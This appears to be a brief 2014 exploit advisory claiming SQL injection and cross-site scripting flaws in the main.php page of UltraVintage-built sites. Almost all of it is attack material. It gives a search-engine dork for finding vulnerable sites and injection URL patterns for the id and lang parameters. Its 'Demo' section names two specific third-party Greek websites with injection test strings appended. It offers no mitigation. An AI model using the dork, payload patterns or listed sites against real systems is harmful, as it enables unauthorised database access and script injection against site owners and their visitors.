[+] Title: UltraVintage Cross Site Scripting / SQL Injection [+] Date: 2014/06/04 [+] Author: Hekt0r [+] Vendor Homepage: http://www.ultravintage.com [+] Tested on: Windows 7 & Kali Linux [+] Vulnerable File: /main.php [+} Dork : intext:"Created by UltraVintage" inurl:/main.php?id= ### POC: [+] Exploit Sql Injection: http://site/main.php?id=[id]&lang=[SQL-Injection] http://site/main.php?id=[SQL-Injection] [+] Exploit Xss: http://site/main.php?id=[xss] ### Demo: [+] Sqli:http://www.anakyklosi.gr/main.php?id=94&lang=en' http://www.anakyklosi.gr/main.php?id=94' http://www.mimel.gr/main.php?id=21&lang=en' http://www.mimel.gr/main.php?id=21' [+] Xss: http://www.anakyklosi.gr/main.php?id= http://www.mimel.gr/main.php?id= ### Credits: [+] Special Thanks: Root SmasheR, Mr.Moein, UmPire, Saeed.Jok3r, M4hdi, ALIREZA_PROMIS, LiNuX-LoVeR And All members of Iran Security Group [+] iransec.net